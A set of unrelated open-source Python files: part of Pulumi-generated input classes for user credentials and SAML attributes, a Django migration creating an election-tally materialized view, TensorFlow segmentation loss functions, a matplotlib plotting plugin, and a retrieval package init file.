def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def username(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username", value)
@pulumi.input_type
class SecurePasswordStoreUserArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None):
if id is not None:
pulumi.set(__self__, "id", id)
if password is not None:
pulumi.set(__self__, "password", password)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def username(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username", value)
@pulumi.input_type
class SwaUserArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None):
if id is not None:
pulumi.set(__self__, "id", id)
if password is not None:
pulumi.set(__self__, "password", password)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def username(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username", value)
@pulumi.input_type
class ThreeFieldUserArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None):
if id is not None:
pulumi.set(__self__, "id", id)
if password is not None:
pulumi.set(__self__, "password", password)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def username(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username", value)
@pulumi.input_type
class UserSchemaArrayOneOfArgs:
def __init__(__self__, *,
const: pulumi.Input[str],
title: pulumi.Input[str]):
"""
:param pulumi.Input[str] const: value mapping to a member of `enum`.
:param pulumi.Input[str] title: display name for the enum value.
"""
pulumi.set(__self__, "const", const)
pulumi.set(__self__, "title", title)
@property
@pulumi.getter
def const(self) -> pulumi.Input[str]:
"""
value mapping to a member of `enum`.
"""
return pulumi.get(self, "const")
@const.setter
def const(self, value: pulumi.Input[str]):
pulumi.set(self, "const", value)
@property
@pulumi.getter
def title(self) -> pulumi.Input[str]:
"""
display name for the enum value.
"""
return pulumi.get(self, "title")
@title.setter
def title(self, value: pulumi.Input[str]):
pulumi.set(self, "title", value)
@pulumi.input_type
class UserSchemaOneOfArgs:
def __init__(__self__, *,
const: pulumi.Input[str],
title: pulumi.Input[str]):
"""
:param pulumi.Input[str] const: value mapping to a member of `enum`.
:param pulumi.Input[str] title: display name for the enum value.
"""
pulumi.set(__self__, "const", const)
pulumi.set(__self__, "title", title)
@property
@pulumi.getter
def const(self) -> pulumi.Input[str]:
"""
value mapping to a member of `enum`.
"""
return pulumi.get(self, "const")
@const.setter
def const(self, value: pulumi.Input[str]):
pulumi.set(self, "const", value)
@property
@pulumi.getter
def title(self) -> pulumi.Input[str]:
"""
display name for the enum value.
"""
return pulumi.get(self, "title")
@title.setter
def title(self, value: pulumi.Input[str]):
pulumi.set(self, "title", value)
@pulumi.input_type
class GetSamlAttributeStatementArgs:
def __init__(__self__, *,
filter_type: str,
filter_value: str,
name: str,
namespace: str,
type: str,
values: Sequence[str]):
"""
:param str filter_type: Type of group attribute filter.
:param str filter_value: Filter value to use.
:param str name: The name of the attribute statement.
:param str namespace: The attribute namespace.
:param str type: The type of attribute statement value.
:param Sequence[str] values: Array of values to use.
"""
pulumi.set(__self__, "filter_type", filter_type)
pulumi.set(__self__, "filter_value", filter_value)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "namespace", namespace)
pulumi.set(__self__, "type", type)
pulumi.set(__self__, "values", values)
@property
@pulumi.getter(name="filterType")
def filter_type(self) -> str:
"""
Type of group attribute filter.
"""
return pulumi.get(self, "filter_type")
@filter_type.setter
def filter_type(self, value: str):
pulumi.set(self, "filter_type", value)
@property
@pulumi.getter(name="filterValue")
def filter_value(self) -> str:
"""
Filter value to use.
"""
return pulumi.get(self, "filter_value")
@filter_value.setter
def filter_value(self, value: str):
pulumi.set(self, "filter_value", value)
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the attribute statement.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: str):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def namespace(self) -> str:
"""
The attribute namespace.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: str):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter
def type(self) -> str:
"""
The type of attribute statement value.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: str):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def values(self) -> Sequence[str]:
"""
Array of values to use.
"""
return pulumi.get(self, "values")
@values.setter
def values(self, value: Sequence[str]):
pulumi.set(self, "values", value)
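Every class in this file follows the same generated pattern: `pulumi.set`/`pulumi.get` store field values under string keys, and each field is re-exposed as a property with a matching setter. A minimal dict-backed imitation of that pattern (the `_values` store is a hypothetical simplification; the real `pulumi.get`/`pulumi.set` also participate in secret and output tracking):

```python
class AttributeStatementSketch:
    """Dict-backed imitation of a @pulumi.input_type class."""

    def __init__(self, name, filter_type=None):
        self._values = {}
        self._values["name"] = name
        if filter_type is not None:
            self._values["filter_type"] = filter_type

    @property
    def name(self):
        # mirrors: return pulumi.get(self, "name")
        return self._values.get("name")

    @name.setter
    def name(self, value):
        # mirrors: pulumi.set(self, "name", value)
        self._values["name"] = value

stmt = AttributeStatementSketch(name="groups", filter_type="STARTS_WITH")
stmt.name = "roles"
print(stmt.name)  # roles
```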
# File: tally_ho/apps/tally/migrations/0036_allcandidatesvotes.py (onaio/tally-ho, Apache-2.0)
# Generated by Django 2.1.1 on 2021-02-01 13:45
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tally', '0035_auto_20201206_0709'),
]
operations = [
migrations.CreateModel(
name='AllCandidatesVotes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tally_id', models.IntegerField()),
('full_name', models.CharField(max_length=255)),
('ballot_number', models.IntegerField()),
('candidate_id', models.IntegerField()),
('candidate_active', models.BooleanField(default=False)),
('stations', models.PositiveIntegerField(default=0)),
('center_ids', django.contrib.postgres.fields.ArrayField(
base_field=models.IntegerField(), size=None)),
('station_numbers', django.contrib.postgres.fields.ArrayField(base_field=models.PositiveSmallIntegerField(blank=True, null=True), size=None)),
('stations_completed', models.PositiveIntegerField(default=0)),
('votes', models.PositiveIntegerField(default=0)),
('total_votes', models.PositiveIntegerField(default=0)),
('all_candidate_votes', models.PositiveIntegerField(default=0)),
('candidate_votes_included_quarantine', models.PositiveIntegerField(default=0)),
('stations_complete_percent', models.IntegerField()),
],
options={
'managed': False,
},
),
migrations.RunSQL(
"""
CREATE MATERIALIZED VIEW tally_allcandidatesvotes AS
SELECT "tally_candidate"."full_name", "tally_candidate"."tally_id" AS "tally_id", "tally_candidate"."id" AS "candidate_id", "tally_ballot"."number" AS "ballot_number", "tally_candidate"."active" AS "candidate_active", COUNT("tally_resultform"."id") FILTER (WHERE ("tally_resultform"."ballot_id" IS NOT NULL AND "tally_resultform"."center_id" IS NOT NULL AND "tally_resultform"."station_number" IS NOT NULL AND "tally_resultform"."tally_id" = ("tally_candidate"."tally_id"))) AS "stations", COUNT("tally_resultform"."id") FILTER (WHERE ("tally_resultform"."ballot_id" IS NOT NULL AND "tally_resultform"."center_id" IS NOT NULL AND "tally_resultform"."form_state" = 0 AND "tally_resultform"."station_number" IS NOT NULL AND "tally_resultform"."tally_id" = ("tally_candidate"."tally_id"))) AS "stations_completed", (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND U3."form_state" = 0) LIMIT 1) AS "votes", CASE WHEN (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND U3."form_state" = 0) LIMIT 1) IS NOT NULL THEN (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND 
U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND U3."form_state" = 0) LIMIT 1) ELSE 0 END AS "total_votes", (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND (U3."form_state" = 0 OR U3."form_state" = 2)) LIMIT 1) AS "all_candidate_votes", CASE WHEN (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND (U3."form_state" = 0 OR U3."form_state" = 2)) LIMIT 1) IS NOT NULL THEN (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND (U3."form_state" = 0 OR U3."form_state" = 2)) LIMIT 1) ELSE 0 END AS "candidate_votes_included_quarantine", CASE WHEN COUNT("tally_resultform"."id") FILTER (WHERE ("tally_resultform"."ballot_id" IS NOT NULL AND "tally_resultform"."center_id" IS NOT NULL AND "tally_resultform"."station_number" IS NOT NULL AND "tally_resultform"."tally_id" = ("tally_candidate"."tally_id"))) > 0 THEN ROUND(CAST(((100 * CAST(COUNT("tally_resultform"."id") 
FILTER (WHERE ("tally_resultform"."ballot_id" IS NOT NULL AND "tally_resultform"."center_id" IS NOT NULL AND "tally_resultform"."form_state" = 0 AND "tally_resultform"."station_number" IS NOT NULL AND "tally_resultform"."tally_id" = ("tally_candidate"."tally_id"))) AS FLOAT)) / CAST(COUNT("tally_resultform"."id") FILTER (WHERE ("tally_resultform"."ballot_id" IS NOT NULL AND "tally_resultform"."center_id" IS NOT NULL AND "tally_resultform"."station_number" IS NOT NULL AND "tally_resultform"."tally_id" = ("tally_candidate"."tally_id"))) AS FLOAT)) AS numeric), 3) ELSE 0 END AS "stations_complete_percent", ARRAY_AGG(DISTINCT "tally_center"."id") AS "center_ids", ARRAY_AGG(DISTINCT "tally_resultform"."station_number") AS "station_numbers" FROM "tally_candidate" INNER JOIN "tally_ballot" ON ("tally_candidate"."ballot_id" = "tally_ballot"."id") LEFT OUTER JOIN "tally_resultform" ON ("tally_ballot"."id" = "tally_resultform"."ballot_id") LEFT OUTER JOIN "tally_center" ON ("tally_resultform"."center_id" = "tally_center"."id") GROUP BY "tally_candidate"."id", "tally_ballot"."number", (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND U3."form_state" = 0) LIMIT 1), CASE WHEN (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND U3."form_state" = 0) LIMIT 1) IS NOT NULL THEN (SELECT CASE 
WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND U3."form_state" = 0) LIMIT 1) ELSE 0 END, (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND (U3."form_state" = 0 OR U3."form_state" = 2)) LIMIT 1), CASE WHEN (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND (U3."form_state" = 0 OR U3."form_state" = 2)) LIMIT 1) IS NOT NULL THEN (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND (U3."form_state" = 0 OR U3."form_state" = 2)) LIMIT 1) ELSE 0 END;
CREATE UNIQUE INDEX tally_allcandidatesvotes_pk ON tally_allcandidatesvotes(candidate_id);
""",
"""
DROP MATERIALIZED VIEW tally_allcandidatesvotes;
"""
),
]
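The view SQL above repeatedly wraps each votes subquery in `CASE WHEN x IS NOT NULL THEN x ELSE 0 END`; in standard SQL (including the PostgreSQL this migration targets) that is exactly `COALESCE(x, 0)`. A quick equivalence check — sqlite3 is used only because it ships with Python; the migration itself needs PostgreSQL for materialized views:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
row = conn.execute(
    """
    SELECT CASE WHEN v IS NOT NULL THEN v ELSE 0 END,
           COALESCE(v, 0)
    FROM (SELECT NULL AS v)
    """
).fetchone()
print(row)  # (0, 0) -- both forms agree on NULL input
```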
# File: modules/old/losses_segmentation.py (jperezvisaires/tfg-intphys, MIT)
import tensorflow as tf
# Weighted Cross Entropy (WCE).
def weighted_crossentropy(beta=1):
def convert_to_logits(y_pred):
y_pred = tf.clip_by_value(y_pred, tf.keras.backend.epsilon(), 1 - tf.keras.backend.epsilon())
return tf.math.log(y_pred / (1 - y_pred))
def weighted_crossentropy_loss(y_true, y_pred):
y_pred = convert_to_logits(y_pred)
loss = tf.nn.weighted_cross_entropy_with_logits(logits=y_pred,
labels=y_true,
pos_weight=beta)
return tf.math.reduce_mean(loss)
return weighted_crossentropy_loss
# Balanced Cross Entropy (BCE).
def balanced_crossentropy(beta=0.5):
def convert_to_logits(y_pred):
y_pred = tf.clip_by_value(y_pred, tf.keras.backend.epsilon(), 1 - tf.keras.backend.epsilon())
return tf.math.log(y_pred / (1 - y_pred))
def balanced_crossentropy_loss(y_true, y_pred):
y_pred = convert_to_logits(y_pred)
pos_weight = beta / (1 - beta)
loss = tf.nn.weighted_cross_entropy_with_logits(logits=y_pred,
labels=y_true,
pos_weight=pos_weight)
return tf.math.reduce_mean(loss * (1 - beta))
return balanced_crossentropy_loss
# Focal Loss (FL).
def focal(alpha=0.5, gamma=0):
def convert_to_logits(y_pred):
y_pred = tf.clip_by_value(y_pred, tf.keras.backend.epsilon(), 1 - tf.keras.backend.epsilon())
return tf.math.log(y_pred / (1 - y_pred))
def focal_loss_with_logits(logits, targets, alpha, gamma, y_pred):
weight_a = alpha * (1 - y_pred) ** gamma * targets
weight_b = (1 - alpha) * y_pred ** gamma * (1 - targets)
return tf.math.log1p(tf.math.exp(-tf.math.abs(logits))) + tf.nn.relu(-logits) * (weight_a + weight_b) + logits * weight_b
def focal_loss(y_true, y_pred):
logits = convert_to_logits(y_pred)
loss = focal_loss_with_logits(logits=logits, targets=y_true, alpha=alpha, gamma=gamma, y_pred=y_pred)
return tf.math.reduce_mean(loss)
return focal_loss
# Dice Loss (F1 Score).
def dice():
def dice_loss(y_true, y_pred):
numerator = 2 * tf.math.reduce_sum(y_true * y_pred, axis=(1,2,3))
denominator = tf.math.reduce_sum(y_true + y_pred, axis=(1,2,3))
return 1 - numerator / denominator
def dice_coefficient(y_true, y_pred):
return 1 - dice_loss(y_true, y_pred)
return dice_loss, dice_coefficient
# Jaccard Loss (IoU).
def jaccard():
def dice_loss(y_true, y_pred):
numerator = 2 * tf.math.reduce_sum(y_true * y_pred, axis=(1,2,3))
denominator = tf.math.reduce_sum(y_true + y_pred, axis=(1,2,3))
return 1 - numerator / denominator
def dice_coefficient(y_true, y_pred):
return 1 - dice_loss(y_true, y_pred)
def jaccard_loss(y_true, y_pred):
return 1 - (dice_coefficient(y_true, y_pred)/(2 - dice_coefficient(y_true, y_pred)))
def jaccard_coefficient(y_true, y_pred):
return 1 - jaccard_loss(y_true, y_pred)
return jaccard_loss, jaccard_coefficient
# Tversky Loss.
def tversky(beta=0.5):
def tversky_loss(y_true, y_pred):
numerator = tf.math.reduce_sum(y_true * y_pred, axis=-1)
denominator = tf.math.reduce_sum(y_true * y_pred + beta * (1 - y_true) * y_pred + (1 - beta) * y_true * (1 - y_pred), axis=-1)
return 1 - (numerator + 1) / (denominator + 1)
return tversky_loss
# Cross Entropy + Dice Loss
def entropy_dice(y_true, y_pred):
def dice_loss(y_true, y_pred):
numerator = 2 * tf.math.reduce_sum(y_true * y_pred, axis=(1,2,3))
denominator = tf.math.reduce_sum(y_true + y_pred, axis=(1,2,3))
return tf.reshape(1 - numerator / denominator, (-1,1,1))
return tf.keras.losses.binary_crossentropy(y_true, y_pred) + dice_loss(y_true, y_pred)
# Focal Loss + Dice Loss
def focal_dice(alpha=0.5, gamma=0):
def dice_loss(y_true, y_pred):
numerator = 2 * tf.math.reduce_sum(y_true * y_pred, axis=(1,2,3))
denominator = tf.math.reduce_sum(y_true + y_pred, axis=(1,2,3))
return 1 - numerator / denominator
def focal(alpha=0.5, gamma=0):
def convert_to_logits(y_pred):
y_pred = tf.clip_by_value(y_pred, tf.keras.backend.epsilon(), 1 - tf.keras.backend.epsilon())
return tf.math.log(y_pred / (1 - y_pred))
def focal_loss_with_logits(logits, targets, alpha, gamma, y_pred):
weight_a = alpha * (1 - y_pred) ** gamma * targets
weight_b = (1 - alpha) * y_pred ** gamma * (1 - targets)
return tf.math.log1p(tf.math.exp(-tf.math.abs(logits))) + tf.nn.relu(-logits) * (weight_a + weight_b) + logits * weight_b
def focal_loss(y_true, y_pred):
logits = convert_to_logits(y_pred)
loss = focal_loss_with_logits(logits=logits, targets=y_true, alpha=alpha, gamma=gamma, y_pred=y_pred)
return tf.math.reduce_mean(loss)
return focal_loss
def focal_dice_loss(y_true, y_pred):
focal_loss = focal(alpha, gamma)
return focal_loss(y_true, y_pred) + dice_loss(y_true, y_pred)
return focal_dice_loss
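As a sanity check on the Dice formula used throughout this file (loss = 1 − 2·|A∩B| / (|A|+|B|)), here is a dependency-free recomputation on flat binary masks — a stand-in for the TensorFlow version, which performs the same reduction over axes (1, 2, 3):

```python
def dice_loss_ref(y_true, y_pred):
    # Plain-Python mirror of: 1 - 2*sum(t*p) / sum(t + p)
    numerator = 2 * sum(t * p for t, p in zip(y_true, y_pred))
    denominator = sum(t + p for t, p in zip(y_true, y_pred))
    return 1 - numerator / denominator

perfect = dice_loss_ref([1, 0, 1, 0], [1, 0, 1, 0])
disjoint = dice_loss_ref([1, 1, 0, 0], [0, 0, 1, 1])
print(perfect, disjoint)  # 0.0 for identical masks, 1.0 for disjoint ones
```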
# File: saffy/plugins/Graphics.py (PPierzc/Sappy, MIT)
import matplotlib.pyplot as plt
import seaborn as sns
from .PluginManager import PluginManager
sns.set()
sns.set_context("talk", font_scale=1.4)
class GraphicsPlugin(PluginManager):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.graphics_style_templates = {
'presentation': {
'plot_background': '#ffedf1',
'figure_background': '#ffffff',
'show_grid': True,
'grid_color': 'r',
'ticks_size': 14,
'label_size': 20,
'plt_style': 'classic',
'line_color': '#ff0641'
},
'paper': {
'plot_background': '#ffffff',
'figure_background': '#ffffff',
'show_grid': True,
'grid_color': 'k',
'ticks_size': 14,
'label_size': 20,
'plt_style': 'classic',
'line_color': '#000000'
}
}
self.graphics_style = self.graphics_style_templates['presentation']
def graphics_set_style(self, style):
if isinstance(style, dict):
self.graphics_style = {**self.graphics_style, **style}
elif style in self.graphics_style_templates.keys():
self.graphics_style = self.graphics_style_templates[style]
else:
raise ValueError('Unknown style')
return self
def graphics_spectrum_plot(
self,
fig=None,
ax=None,
title='',
xlabel='',
ylabel='',
legend=True,
color=None,
*args,
**kwargs
):
color = color if color else self.graphics_style['line_color']
if 'plt_style' in self.graphics_style.keys():
plt.style.use(self.graphics_style['plt_style'])
show = False
if fig is None or ax is None:
show = True
fig, ax = plt.subplots(nrows=self.num_channels, ncols=1)
if self.num_channels == 1:
ax = [ax]
for epoch in self.spectrum:
for idx, channel in enumerate(epoch):
ax[idx].plot(
self.spectrum_freqs,
channel,
color=color,
*args,
**kwargs
)
ax[idx].margins(0.1, 0.1)
ax[idx].set_title(
self.channel_names[idx],
fontsize=20
)
ax[idx].set_facecolor(self.graphics_style['plot_background'])
ax[idx].tick_params(labelsize=self.graphics_style['ticks_size'])
ax[idx].grid(self.graphics_style['show_grid'], color=self.graphics_style['grid_color'])
fig.text(
0.5,
0.05,
xlabel,
ha='center',
fontsize=self.graphics_style['label_size']
)
fig.text(
0.5,
0.95,
title,
ha='center',
fontsize=self.graphics_style['label_size']
)
fig.text(
0.04,
0.5,
ylabel,
va='center',
rotation='vertical',
fontsize=self.graphics_style['label_size']
)
fig.patch.set_facecolor(self.graphics_style['figure_background'])
# We only want the label to show once if multiple epochs
if 'label' in kwargs:
del kwargs['label']
if legend:
for a in ax:
a.legend()
if show:
plt.show()
plt.close()
def graphics_time_plot(
self,
fig=None,
ax=None,
title='',
xlabel='',
ylabel='',
legend=True,
color=None,
*args,
**kwargs):
color = color if color else self.graphics_style['line_color']
if 'plt_style' in self.graphics_style.keys():
plt.style.use(self.graphics_style['plt_style'])
# Show the figure only when no fig or ax was passed in, assuming standalone use is desired.
show = False
if fig is None or ax is None:
show = True
fig, ax = plt.subplots(nrows=self.num_channels, ncols=1)
if self.num_channels == 1:
ax = [ax]
for epoch in self.data:
for idx, channel in enumerate(epoch):
ax[idx].plot(
self.t,
channel,
color=color,
*args,
**kwargs
)
for tag in self.tags:
ax[idx].axvline(
tag / self.fs,
color='#000000',
ls='--'
)
ax[idx].margins(0.1, 0.1)
ax[idx].set_title(
self.channel_names[idx],
fontsize=20
)
ax[idx].set_facecolor(self.graphics_style['plot_background'])
ax[idx].tick_params(labelsize=self.graphics_style['ticks_size'])
ax[idx].grid(self.graphics_style['show_grid'], color=self.graphics_style['grid_color'])
fig.text(
0.5,
0.05,
xlabel,
ha='center',
fontsize=self.graphics_style['label_size']
)
fig.text(
0.5,
0.95,
title,
ha='center',
fontsize=self.graphics_style['label_size']
)
fig.text(
0.04,
0.5,
ylabel,
va='center',
rotation='vertical',
fontsize=self.graphics_style['label_size']
)
fig.patch.set_facecolor(self.graphics_style['figure_background'])
# We only want the label to show once if multiple epochs
if 'label' in kwargs:
del kwargs['label']
if legend:
for a in ax:
a.legend()
if show:
plt.show()
plt.close()
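`graphics_set_style` accepts either a template name or a partial dict; in the dict case it merges the override on top of the active style via `{**self.graphics_style, **style}`, so unspecified keys keep their current values. The merge behaves as follows (minimal hypothetical style dicts, not the full templates above):

```python
base = {"plot_background": "#ffedf1", "line_color": "#ff0641", "ticks_size": 14}
override = {"line_color": "#000000"}

merged = {**base, **override}  # right-hand dict wins on key collisions
print(merged)
# {'plot_background': '#ffedf1', 'line_color': '#000000', 'ticks_size': 14}
```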
# File: retrieval/dense/__init__.py (park-sungmoo/odqa_baseline_code, Apache-2.0)
from retrieval.dense.dense_base import DenseRetrieval
from retrieval.dense.dpr_base import DprRetrieval, BaseTrainMixin, Bm25TrainMixin
from retrieval.dense.dpr import DprBert
from retrieval.dense.colbert import ColBert
from retrieval.dense.dpr_electra import DprElectra